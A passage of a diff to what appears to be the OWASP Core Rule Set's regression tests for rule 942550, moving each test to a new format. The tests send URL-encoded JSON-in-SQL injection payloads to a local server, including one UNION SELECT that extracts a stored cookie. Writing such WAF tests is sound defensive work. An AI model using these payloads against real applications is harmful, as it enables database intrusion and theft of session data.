text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 
80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 3 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 4 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 5 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 6 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 7 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 8 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 9 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 10 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 11 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 12 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 13 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 14 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 15 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 16 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 17 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 18 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET 
+ port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 19 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 20 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 21 desc: | JSON in SQL (ARGS) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 22 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - 
test_title: 942550-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 23 desc: | JSON in SQL (ARGS) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 24 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie 
from cookie limit 1 ),NULL)) s(token)--/state stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 25 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":"b"}' ? 
'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 26 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":"b"}' ? 'a' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 27 desc: | JSON in SQL (ARGS) decoded payload: OR '[1,2]' ? 
'1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 28 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2]' ? '1' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log: + expect_ids: 